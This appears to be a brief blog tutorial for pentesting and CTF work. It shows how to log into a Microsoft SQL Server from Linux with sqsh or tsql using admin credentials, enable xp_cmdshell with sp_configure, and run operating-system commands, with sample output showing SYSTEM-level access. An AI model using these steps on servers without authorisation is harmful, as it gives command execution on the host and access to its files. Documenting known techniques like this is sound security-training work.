Hi everyone!

Today’s post is on trying to access the Microsoft SQL server’s winshell from Linux or Unix. This is useful during pentesting or CTF if you have the SQL credentials and ability to remotely access the SQL service. Having access to the winshell means you have access to the system’s files. Let’s get started!

1. Requirements

• You must have the SQL credentials. Best is if you have admin creds (E.g Username “sa”)
• MS SQL server has open port 1433 for remote access (Unless you can tunnel into the remote server)

2. Login

Via Sqsh:

sqsh -S 10.1.1.1:1234 -U sa -P p@ssw0rd

Via Tsql:

tsql -S 10.1.1.1:1234 -U sa -P p@ssw0rd

3. Configure to use xp_cmdshell if disabled (Allowed for admin accounts only)

1> sp_configure 'show advanced options', '1'
2> RECONFIGURE
3> \go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> sp_configure 'xp_cmdshell', '1'
2> RECONFIGURE
3> \go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> 

Note for Tsql, use “go” instead of “\go”.

4. Example of using xp_cmdshell

1> EXEC xp_cmdshell 'whoami'
2> \go

        output
        nt authority\system
        NULL
(2 rows affected, return status = 0)
1>

I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Ref [1]: https://www.mssqltips.com/sqlservertip/1020/enabling-xpcmdshell-in-sql-server/
Ref [2]: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15